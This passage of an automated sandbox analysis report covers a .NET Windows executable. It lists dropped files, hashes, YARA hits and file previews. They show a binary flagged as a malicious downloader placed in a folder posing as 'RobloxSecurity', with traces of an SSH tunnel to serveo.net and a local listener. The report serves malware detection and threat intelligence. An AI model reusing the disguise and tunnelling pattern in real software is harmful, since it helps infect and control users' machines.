                                                                                                    SSDEEP:3072:DnDLp7S/mYF0UhPrxl3ozejFDcN+hHzsZ4oakRPcLRxBzcSMpUNauA1CCq4/ngp6:v2zU+xzaIgE3MpTq4/gp3Qa6+2
                                                                                                    MD5:50CEE141B6A528A99DD4F05900D33751
                                                                                                    SHA1:D0CBEBBBF89C29E411F2D067C6B80E1A5C950BD1
                                                                                                    SHA-256:38F3BFD3A68F925464D525E9A676B382D9B17CD6A48C47C084E28293D0B82ADE
                                                                                                    SHA-512:4563D44FC5DD35B2BB9A9705A1861E698BB6F3544CAD3431704BF8A48873D6FF3CE141D1D7C86763717CDB65DA5B840034C44C86333763E9A60E3FB67BB3F1BB
                                                                                                    Malicious:false
                                                                                                    Preview:MDMP..a..... ..........e.........................%..........<....1...........1......._.."...........l.......8...........T............m..:...........pP..........\R..............................................................................eJ.......R......Lw......................T...........|..e.............................0..................W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .S.u.m.m.e.r. .T.i.m.e...........................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...........................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WERCE32.tmp.WERInternalMetadata.xml

                                                                                                    Download File
                                                                                                    Process:C:\Windows\System32\WerFault.exe
                                                                                                    File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):9074
                                                                                                    Entropy (8bit):3.706987583444449
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:R6l7wVeJeP9UK6YEfqGgmfZ22VKcJprP89bGbIfiCm:R6lXJe9UK6YECGgmfE2VHEGkfO
                                                                                                    MD5:B7EEBD7DDE9F9346C004426EF7E9285C
                                                                                                    SHA1:BBDC2419A74E5E87623CB49668CB64EF186A8EFB
                                                                                                    SHA-256:720E58F20F931C8990B2E2FC684F254003F95E54CF66E3E6F30D4120E7CEBBC1
                                                                                                    SHA-512:6C32FE678F258B6B3328511509BF3D642901D1AED046B46F773CD9FE1E9DF9FC55BE604182920975B4ABA7D49DD7EE7D2D6A2772F6BA33FFF96696C6FEDAF7FB
                                                                                                    Malicious:false
                                                                                                    Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.8.0.7.2.<./.P.i.

                                                                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WERCE62.tmp.xml

                                                                                                    Download File
                                                                                                    Process:C:\Windows\System32\WerFault.exe
                                                                                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4845
                                                                                                    Entropy (8bit):4.480097738711733
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:cvIwWl8zsTJg771I9snWpW8VYPYm8M4JEHqHFNIyq8vcHquyDg4Mhudd:uIjftI7vW7VnJHMWPuyDg4Mhwd
                                                                                                    MD5:C6C49753428EC5380CC37E96E3B673D3
                                                                                                    SHA1:0E2ECEB6D5FD08E35AAAEDB57594070504AAC059
                                                                                                    SHA-256:3FF9C8077B9660804B2B607CFBEACD83E8143FE545E83508B4A365EF257A6FEC
                                                                                                    SHA-512:F0AA8DBA794AE193837D5322361461A12609F306E0193F6EFEB03989B9DF3976B21F341A2DFCD04CA8E9CD5AD8C594362244013A673AA534AE6AB889871AA7E9
                                                                                                    Malicious:false
                                                                                                    Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="187580" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                                                                    C:\Users\user\.ssh\known_hosts

                                                                                                    Download File
                                                                                                    Process:C:\Windows\System32\OpenSSH\ssh.exe
                                                                                                    File Type:ASCII text, with very long lines (404), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):406
                                                                                                    Entropy (8bit):5.90555968999191
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12:TyFqFcWmedrh+bMcBVM5uUkZq0lbUMO9wHWSSlICnoF/:dmgSbMcBVM5A409Kw1SlIQ+/
                                                                                                    MD5:EC266D309CBAD86B3E4939F2117DFE39
                                                                                                    SHA1:CF12599FBDC167B4C01B518A0BD63D51CD83798B
                                                                                                    SHA-256:2F8ECCA5380615BCD1530817933A7EA03D2D4FDC7D6E634829AA54E40413B05D
                                                                                                    SHA-512:D2D39D9174F459146DE57C205979E7815829C37EAFD214CDCE88F90A961F04E5468290E530CF31B9B621276A86EB3A071BBF3464962E1A8E44A7478794571BAA
                                                                                                    Malicious:false
                                                                                                    Preview:serveo.net,138.68.79.95 ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDxYGqSKVwJpQD1F0YIhz+bd5lpl7YesKjtrn1QD1RjQcSj724lJdCwlv4J8PcLuFFtlAA8AbGQju7qWdMN9ihdHvRcWf0tSjZ+bzwYkxaCydq4JnCrbvLJPwLFaqV1NdcOzY2NVLuX5CfY8VTHrps49LnO0QpGaavqrbk+wTWDD9MHklNfJ1zSFpQAkSQnSNSYi/M2J3hX7P0G2R7dsUvNov+UgNKpc4n9+Lq5Vmcqjqo2KhFyHP0NseDLpgjaqGJq2Kvit3QowhqZkK4K77AA65CxZjdDfpjwZSuX075F9vNi0IFpFkGJW9KlrXzI4lIzSAjPZBURhUb8nZSiPuzj..

                                                                                                    C:\Users\user\AppData\Local\4cn9n9irdf\p.dat

                                                                                                    Download File
                                                                                                    Process:C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe
                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4
                                                                                                    Entropy (8bit):1.5
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:CSn:CSn
                                                                                                    MD5:FCF1D8D2F36C0CDE8ECA4B86A8FE1DF8
                                                                                                    SHA1:C7F9B0FB437533FBD302CC7DCA6D68E101ADCE87
                                                                                                    SHA-256:AA522A6BEECBEB04BEAA3F2818524C5FA79D01549B7F330F0CC0DAF925A080EE
                                                                                                    SHA-512:893B79C9DD383A0E024CD278921A99DF9EB60CEDC67C69580518016664BA11829801FF0E8CE87035B3050E616FBEE84D04CABCD4C9D90451D236A481B348E8D5
                                                                                                    Malicious:false
                                                                                                    Preview:6787

                                                                                                    C:\Users\user\AppData\Local\4cn9n9irdf\report.lock

                                                                                                    Download File
                                                                                                    Process:C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe
                                                                                                    File Type:very short file (no magic)
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1
                                                                                                    Entropy (8bit):0.0
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:U:U
                                                                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                    Malicious:false
                                                                                                    Preview:1

                                                                                                    C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\vkefq4cv.oil.exe.log

                                                                                                    Download File
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe
                                                                                                    File Type:CSV text
                                                                                                    Category:dropped
                                                                                                    Size (bytes):847
                                                                                                    Entropy (8bit):5.354334472896228
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:ML9E4KQEAE4KKUNKKDE4KGKZI6KhPKIE4TKBGKoM:MxHKQEAHKKkKYHKGSI6oPtHTH0
                                                                                                    MD5:578A9969E472E71F38254887263D82A4
                                                                                                    SHA1:8ED7FC31B0F6660DBAC702BC603FBF4FE88B2F5D
                                                                                                    SHA-256:AB8369CDA9CB7709E00867CE5460553393ABF742CBD58501AD6113FDF884B938
                                                                                                    SHA-512:E55F7150298EF037848826E79EB72AD03D3D75C278D91CF0EA6AE3C04B89D4ABBD7BD2D5EB274715687012B90F51D53056F01CDBF5DDBB602711E66909C8BD87
                                                                                                    Malicious:false
                                                                                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..

                                                                                                    C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\jqOHOuPMJP.exe.log

                                                                                                    Download File
                                                                                                    Process:C:\Users\user\Desktop\jqOHOuPMJP.exe
                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1119
                                                                                                    Entropy (8bit):5.345080863654519
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0Hj
                                                                                                    MD5:88593431AEF401417595E7A00FE86E5F
                                                                                                    SHA1:1714B8F6F6DCAAB3F3853EDABA7687F16DD331F4
                                                                                                    SHA-256:ED5E60336FB00579E0867B9615CBD0C560BB667FE3CEE0674F690766579F1032
                                                                                                    SHA-512:1D442441F96E69D8A6D5FB7E8CF01F13AF88CA2C2D0960120151B15505DD1CADC607EF9983373BA8E422C65FADAB04A615968F335A875B5C075BB9A6D0F346C9
                                                                                                    Malicious:false
                                                                                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                    Download File
                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):2240
                                                                                                    Entropy (8bit):5.379131272179432
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:ZWSU4y4RQmFoUeWmfgZ9tK8NPP8m7u1iMugei/ZPUyuE:ZLHyIFKL3IZ2KHVOugsE
                                                                                                    MD5:BAE959C907A8BF1C9DA9D7779AEAB956
                                                                                                    SHA1:7A5EF77FF6B9A251B38EA7284D14F31CE1F72D41
                                                                                                    SHA-256:DB9E2A6D8EF4584F7B714716AA2637B2CFD3B8F55939CFE15B0EE3DAD61D7E80
                                                                                                    SHA-512:362F8BD77889F4C6F1786B88E0AAF095174CCCD831B5BC4886659A6D3DB6693C13E17A97674B0A510A5820CAA0C6C59DD95785089203990961B9DFF9169900C3
                                                                                                    Malicious:false
                                                                                                    Preview:@...e................................................@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

                                                                                                    C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe

                                                                                                    Download File
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe
                                                                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):131528
                                                                                                    Entropy (8bit):5.587236079192015
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3072:UsziYfIDSul4Z49b1KACKvCfGZ4sYRuRnsqlEr:UsvESS4Z49b1bSG2snm
                                                                                                    MD5:869F82DF0992DC2F5155D8F69FD1C9CF
                                                                                                    SHA1:5B48D32ACA1F7705C03E2BD592F68A2B9C9A7A22
                                                                                                    SHA-256:D77412B72A893EE96E82D7EFBD9FC2612176DA00DF5EBC066C13C303F558BCC9
                                                                                                    SHA-512:B0F0E7F6354B64CAC887600690531BA93F8AEB79E746FB9848C5F16F09931E3D8B5C2AD2A617FB9C978020450B4F717F9485D468B9C6098E6F319A59B26FAD19
                                                                                                    Malicious:true
                                                                                                    Yara Hits:
                                                                                                    • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe, Author: Joe Security
                                                                                                    Antivirus:
                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....[..........."...0.................. ........@.. .......................@............`.................................L...O.......8................'... ....................................................... ............... ..H............text........ ...................... ..`.rsrc...8...........................@..@.reloc....... ......................@..B........................H...........X.......5...................................................PK..........................................5...P...n...w...{...................................................................|.......................8...K.......................[......."...#...&...'...........=.......F.......8...............2...p...s...a............ ...#...'...+...c...i...i...i...i..PK......PK......PK......PK..F...o .....(r....*".(s....*.s,........*.(&....*~(....ou....!...~!...(3....".

                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2h200bfl.rmg.psm1

                                                                                                    Download File
                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):60
                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                    Malicious:false
                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jghiq33d.kjq.ps1

                                                                                                    Download File
                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):60
                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                    Malicious:false
                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mc5dlpdd.are.psm1

                                                                                                    Download File
                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):60
                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                    Malicious:false
                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nt4c2ncj.tfe.ps1

                                                                                                    Download File
                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):60
                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                    Malicious:false
                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                    C:\Users\user\AppData\Local\Temp\hahahahaha.txt

                                                                                                    Download File
                                                                                                    Process:C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe
                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                    Category:modified
                                                                                                    Size (bytes):120
                                                                                                    Entropy (8bit):4.564485170699406
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:BOzReCWAMb7iDRVivmiurQlyrWRYAdMKq8QFKxrg5bvn:UaXiDRAYrQlyrKKv6c5bvn
                                                                                                    MD5:E10E8583FFEE40E89FEF7419CC14ADA4
                                                                                                    SHA1:1D97614F6E46CB7B87F96740E9C315931BDAF222
                                                                                                    SHA-256:615581F4791B9D308FDC033455A8E2F22A01CE236C185908652B8B0A93CFF589
                                                                                                    SHA-512:6139701FA1C1B937611500F4875CB000E03FDA04732BA6F7B0BA074E7FA2AFDCC8970A6C326B8754F9E1C87BE56E2DDF1293F957B6EA9C07228E062936B06AAD
                                                                                                    Malicious:false
                                                                                                    Preview:Failed to listen on prefix 'http://127.0.0.1:6787/' because it conflicts with an existing registration on the machine...

                                                                                                    C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe

                                                                                                    Download File
                                                                                                    Process:C:\Users\user\Desktop\jqOHOuPMJP.exe
                                                                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):131528
                                                                                                    Entropy (8bit):5.587236079192015
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3072:UsziYfIDSul4Z49b1KACKvCfGZ4sYRuRnsqlEr:UsvESS4Z49b1bSG2snm
                                                                                                    MD5:869F82DF0992DC2F5155D8F69FD1C9CF
                                                                                                    SHA1:5B48D32ACA1F7705C03E2BD592F68A2B9C9A7A22
                                                                                                    SHA-256:D77412B72A893EE96E82D7EFBD9FC2612176DA00DF5EBC066C13C303F558BCC9
                                                                                                    SHA-512:B0F0E7F6354B64CAC887600690531BA93F8AEB79E746FB9848C5F16F09931E3D8B5C2AD2A617FB9C978020450B4F717F9485D468B9C6098E6F319A59B26FAD19
                                                                                                    Malicious:true
                                                                                                    Yara Hits:
                                                                                                    • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe, Author: Joe Security
                                                                                                    Antivirus:
                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....[..........."...0.................. ........@.. .......................@............`.................................L...O.......8................'... ....................................................... ............... ..H............text........ ...................... ..`.rsrc...8...........................@..@.reloc....... ......................@..B........................H...........X.......5...................................................PK..........................................5...P...n...w...{...................................................................|.......................8...K.......................[......."...#...&...'...........=.......F.......8...............2...p...s...a............ ...#...'...+...c...i...i...i...i..PK......PK......PK......PK..F...o .....(r....*".(s....*.s,........*.(&....*~(....ou....!...~!...(3....".

                                                                                                    C:\Windows\appcompat\Programs\Amcache.hve

                                                                                                    Download File
                                                                                                    Process:C:\Windows\System32\WerFault.exe
                                                                                                    File Type:MS Windows registry file, NT/2000 or above
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1835008
                                                                                                    Entropy (8bit):4.466124802594884
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6144:lIXfpi67eLPU9skLmb0b44WSPKaJG8nAgejZMMhA2gX4WABl0uNEdwBCswSbA:GXD944WlLZMM6YFHq+A
                                                                                                    MD5:0B41F0D1011D6FFA013E52F811F4F71B
                                                                                                    SHA1:61D222828FC0895D776ABE64598659C31B038EFA
                                                                                                    SHA-256:550D698638F5585C2C5605D7BF1D8D2D6CB51795D62A084A5FC1B5B69D4AED55
                                                                                                    SHA-512:919455EED658B8532490C95E7A333186D1B69E0636F1339834DE431CD2E132D2E5B9644570A46563326EE33E46E74A036C516A9D5834AA3C7C05DC70173DCE86
                                                                                                    Malicious:false
                                                                                                    Preview:regf6...6....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm...?4\..............................................................................................................................................................................................................................................................................................................................................4...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                    \Device\Null

                                                                                                    Download File
                                                                                                    Process:C:\Windows\System32\timeout.exe
                                                                                                    File Type:ASCII text, with CRLF line terminators, with overstriking
                                                                                                    Category:dropped
                                                                                                    Size (bytes):60
                                                                                                    Entropy (8bit):4.41440934524794
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:hYFqdLGAR+mQRKVxLZXt0sn:hYFqGaNZKsn
                                                                                                    MD5:3DD7DD37C304E70A7316FE43B69F421F
                                                                                                    SHA1:A3754CFC33E9CA729444A95E95BCB53384CB51E4
                                                                                                    SHA-256:4FA27CE1D904EA973430ADC99062DCF4BAB386A19AB0F8D9A4185FA99067F3AA
                                                                                                    SHA-512:713533E973CF0FD359AC7DB22B1399392C86D9FD1E715248F5724AAFBBF0EEB5EAC0289A0E892167EB559BE976C2AD0A0A0D8EFC407FFAF5B3C3A32AA9A0AAA4
                                                                                                    Malicious:false
                                                                                                    Preview:..Waiting for 3 seconds, press a key to continue ....2.1.0..

                                                                                                    Static File Info

                                                                                                    General

                                                                                                    File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                    Entropy (8bit):5.261474995854771
                                                                                                    TrID:
                                                                                                    • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                                                    • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                                                    • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                                    • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                    • DOS Executable Generic (2002/1) 0.01%
                                                                                                    File name:jqOHOuPMJP.exe
                                                                                                    File size:14'336 bytes
                                                                                                    MD5:7e9a93c69aecfc2bbda9470fbd4556db
                                                                                                    SHA1:ab0e810472a897affac1a761b49595939f6897a9
                                                                                                    SHA256:82e68bb4f56181a0b2458f2861aa7b5fa1bb0f4ce30907d579c3b92707ef2647
                                                                                                    SHA512:59abfa455c148c88959f992864de627857e950d9abb36b49efd979da4139a50847932d9577d658d0d793802ef5a6f6b91520440af2ff983dbf04126cf909d342
                                                                                                    SSDEEP:384:1R8wtU1eai/zbM/XygkxOu6cyhLWi1fXlSW:1eCU1vi7blHhyhiij
                                                                                                    TLSH:2F522C3577E49637CABE0E7649B253404375EA068822DFDD2CC8600D5DD3B868562FB7
                                                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....A..........."...0..............M... ...`....@.. ....................................`................................

                                                                                                    File Icon

                                                                                                    Icon Hash:90cececece8e8eb0

                                                                                                    Static PE Info

                                                                                                    General

                                                                                                    Entrypoint:0x404d16
                                                                                                    Entrypoint Section:.text
                                                                                                    Digitally signed:false
                                                                                                    Imagebase:0x400000
                                                                                                    Subsystem:windows gui
                                                                                                    Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                                                    DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                    Time Stamp:0x8F4114C5 [Wed Feb 28 05:04:05 2046 UTC]
                                                                                                    TLS Callbacks:
                                                                                                    CLR (.Net) Version:
                                                                                                    OS Version Major:4
                                                                                                    OS Version Minor:0
                                                                                                    File Version Major:4
                                                                                                    File Version Minor:0
                                                                                                    Subsystem Version Major:4
                                                                                                    Subsystem Version Minor:0
                                                                                                    Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                                    Entrypoint Preview

                                                                                                    Instruction
                                                                                                    jmp dword ptr [00402000h]
